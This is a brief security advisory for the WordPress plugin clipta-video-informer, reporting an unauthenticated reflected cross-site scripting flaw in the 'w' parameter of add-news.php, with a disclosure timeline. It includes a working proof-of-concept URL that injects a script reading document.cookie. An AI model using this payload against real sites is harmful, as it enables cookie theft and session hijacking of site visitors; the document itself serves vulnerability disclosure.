wp-plugin : clipta-video-informer

Plugin Details
Plugin Name: wp-plugin : clipta-video-informer
Effected Version : 1 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : anantshri
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :
http://localhost/wp-content/plugins/clipta-video-informer/add-news.php?w=w"></script><script>alert(document.cookie)</script>

 

Vulnerable Parameter : w

 

Type of XSS : Reflected


Disclosure Timeline
Vendor Contacted : 2014-01-04
Plugin Status : Updated on
Public Disclosure : July 7, 2014
CVE Number :
Plugin Description :
[| Clipta Video Informer is a free service for Web publishers that offers access to the Clipta Partner Network to promote their video content and drive more traffic to their site. Publishers can now easily add news to [Info.Clipta.com](http://info.clipta.com) which will also appear on other topically relevant sites in the Clipta Informer Network. ]